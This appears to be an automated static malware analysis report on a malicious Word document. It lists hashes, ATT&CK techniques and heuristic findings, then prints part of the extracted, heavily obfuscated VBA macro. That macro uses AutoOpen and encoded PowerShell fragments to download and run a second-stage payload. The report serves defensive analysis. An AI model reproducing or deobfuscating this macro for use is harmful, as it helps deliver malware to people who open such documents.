Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9968a7b9fd765ea…

MALICIOUS

Office (OLE)

Size: 118.5 KB
Created: 2018-02-17 08:56:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0de68ca3c2cdb7e03c10f7901ea3733b
SHA-1: dfa3c668812433f98b3f4865a572c9818b9005df
SHA-256: e9968a7b9fd765ea2abcadf80e2163cc0de0841f78ee8d32938358720071d3d2
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro uses a Shell() call, indicating an attempt to execute arbitrary commands. The heavy obfuscation of the script together with the Shell() call strongly suggests it is designed to download and execute a second-stage payload, a common malware-delivery technique.

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31043 bytes
SHA-256: 203577861cff02f72ac9445b77a0b56d5a747583864af8e7d0d9fd20c9b76503

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hFNFqPXqU"
Function zvalXtUXb()
On Error Resume Next
miMHnNJLRMs = 1365530 + Atn(sNaHoJSQjtr) / ilLuZBj - Sgn(JPpcH * Log(cdmTfwXQZI)) / (3967265 - VYadvvRldAC * MbcCYd - wAJjodQOs)
wHuEkBW = 8421405 + Atn(LCasfHij) / uLVBcbiG - Sgn(WUrvk * Log(jMrmzfjYt)) / (2195428 - ziUvUYsKdnfH * NzJLW - bQRDMSPrh)
imiDfilXbMz = 7720788 + Atn(mbpobvm) / BwwlHj - Sgn(FnZzV * Log(CWkXhiHdE)) / (6255593 - WPBDRQl * XDUbc - KULNcShStjE)
fAdBPWB = (MlNDldJ) + yHBjksbJKSUgsssd("KnvamsJmEdsKwEOqME[3,11,2]-joiNKNiKNi)((KNi & ( GbYSHeLLiD[1]+GbYsheLLid[13]+KFQXKFQ) (((KFQ(zKFQ+KFQLPezLPKNiqUWsb", 17, 94)
kwizQrYu = 9727139 + Atn(ivHsXKwQ) / NdDWRwLzrn - Sgn(ZXLpQTmNZEfmT * Log(BJwXWGiOVB)) / (1803922 - VQwbXvH * rLjScD - jqXirjuQp)
butMTftGsA = 2628181 + Atn(VhKLBJfFzV) / zjjiNkq - Sgn(fvSizXzTR * Log(bAJOwaZwjJ)) / (5016635 - WFCUsqwMWJaP * jCzKnDpOiWU - jkJFR)
zioMWjrqNU = 689771 + Atn(ztYMfifHVFE) / atjPXZlt - Sgn(kYsjiP * Log(FoHEGt)) / (3137626 - HpUjHwUIZFuK * UlffK - PUjdzPWBjz)
YkOOQCwj = (nOriznXnv) + yHBjksbJKSUgsssd("qjsTjN .( $ENV:pUBliC[13]+$Env:PubLiC[5]+'x') ( (('&((GV KNi*Mdr*KNi).naGiLDjOF piUlhiHzEFTV", 7, 66)
sorbHhT = 3241758 + Atn(unLZuMhLMDZa) / RzFNwJKRQ - Sgn(WaOOcYhVio * Log(OcEtkbXtYwCwWB)) / (270252 - NNNGUdJ * wfwEniirlZCX - TOinX)
fwQwn = 8419815 + Atn(UbrNbKTIUif) / SPuFcSGuQKNz - Sgn(dMtwfTwmdUWnkd * Log(KZXDtRElYJ)) / (1031128 - RzOJOuPz * aJoPjwpuYSspdj - nJEhZbVpawfoP)
ZZoMWZ = 2193394 + Atn(sVjfkQ) / oKSPrAqMfoN - Sgn(VFpiXWFTO * Log(DKZjQZXI)) / (9490254 - aFVuOJkUwNTrar * CDnIJfwUXGIp - kRpWqO)
iaiYRYHBG = (EFlCbZwSBTaMX) + yHBjksbJKSUgsssd("DwTki+O8ztO8zLP+zLPzKFQ+KFQzLP+zLP)zLP+zL'+'P razLP+zLPndomzLP+zLP'+';eh1YYU '+'= .(zLP+zLPO8zLP+zLPzzLP+zLPnzLP+zLPeOKNi+KNi8KFQ+KFQz+O8zwO8zzLP+zLP+O8KNi+KNiz-zliDPnjTinSRuafNsdcSNPfAwGUoUVOwlBN", 5, 157)
XJhfsP = 1249462 + Atn(cjhXwAMt) / SHTuXucTa - Sgn(YGOXvFWCuTfmIM * Log(JBndBLWpUuOPF)) / (3177232 - BRXshNOLl * azRZtjzH - NtoqZ)
wapTD = 6876412 + Atn(Rtchp) / mVSNPQff - Sgn(pBLaNFPbOPIEDf * Log(bwIfwUj)) / (863814 - JLvHfRibWR * miwWw - RORhM)
mBNhdpnlC = 6768092 + Atn(FmQHziaGzjRBJ) / wzjjil - Sgn(ZwzljuDUmu * Log(cFBsAacnqwpvhV)) / (7508067 - UQkAizNjpRVQo * lKoUZDHEw - EuufkB)
BYhRdn = (WjAnTdlzn) + yHBjksbJKSUgsssd("upDzcjFRXUcaTSRaaMRKN'+'i+KNiFQO8zezLP+zLPO8zLP+KFQ+KFQzLPzzLP+zLP)zLKNi+KNiP+zLP;foreach(eh1asKFQ+K'+'FQzLP+zLPfc in ehzLP+zLP1zLP+zKFQ+KFQLPAzL'+'P+zLPaDh", 20, 134)
LrCRzN = 2529294 + Atn(jmQTivjChvowFU) / nhItBuLlBNBs - Sgn(bUFuFUMOSkXwib * Log(ZNkzrKf)) / (5706582 - NLBXAOGdD * bNqutkHZUzlv - SAMncBAl)
mYSTzUuwlu = 9095135 + Atn(jhtSoNEdtvvzz) / TrPklKjkRsj - Sgn(obdcCBjWG * Log(zRSMQTs)) / (9932867 - SDcUlmQAk * wPBjRYc - QsuTb)
JXKSHww = 5523399 + Atn(szRYtM) / SVQULHsqlAwLI - Sgn(whAnoTbGdzbzOs * Log(zbqwFwfSzMVH)) / (5017608 - tXPUHu * QlFsQLsR - MszCmZFNCBSOD)
ofEhJ = (sVCjEMwTLiG) + yHBjksbJKSUgsssd("KRDtXafVQACE(([chAR]79+[chAR]56+[chAR]12KN'+'i+KNi2),[StRING][chAR]39).RepLACE(XQpiDKjDjIPdfjZSRIzCjJSRifoms", 10, 70)
jtvHmLjOuFW = 5584893 + Atn(XUURCR) / cBNLnj - Sgn(LHpfjlB * Log(DiVHNPiNzZ)) / (7942885 - ifQKK * BWWVfwZ - afLZUrHtQ)
rhQbfuw = 7150423 + Atn(vDpznPlwclfrfV) / jiHiDYhn - Sgn(wCYFzwkPiOPKL * Log(jGtwzounj)) / (778871 - Hclhh * NQAwlqfAf - PMQGI)
ibaVok = 4705176 + Atn(YcJZjw) / LVUDqUzhzpBuLa - Sgn(POzRoiaPztjWMF * Log(wdREnPWcK)) / (2141904 - iPbEN * faMvbSK - kFWJGznb)
HOvzjkoHOZ = (iqkGplnBFA) + yHBjksbJKSUgsssd("aBjGzbjAiCdmZtz'+'LP/RCYnzLP+zLKNi+KNiPtA/O8z.Split(O8KNi+KNizLP+zLPz?O8zzLP+zLP);ehzLP+zLP1SDzLP+zLPC zLP+z'+'LP= zLP+zLPezLSM", 15, 111)
lmZkaNpkvj = 7187069 + Atn(cXLHoDKASDNMG) / khlGssUJoLVUY - Sgn(ddkGCizT * Log(VSjXsSj)) / (8720886 - pVDLuPwsYS * zlTisWpTGKX - QVPnJVbrEStiD)
VpvwjLXu = 2593863 + Atn(iUIJKfkM) / zFfWdQmRScm - Sgn(fcoXzbihrpafD * Log(wwANMj)) / (1725646 - oEq
... (truncated)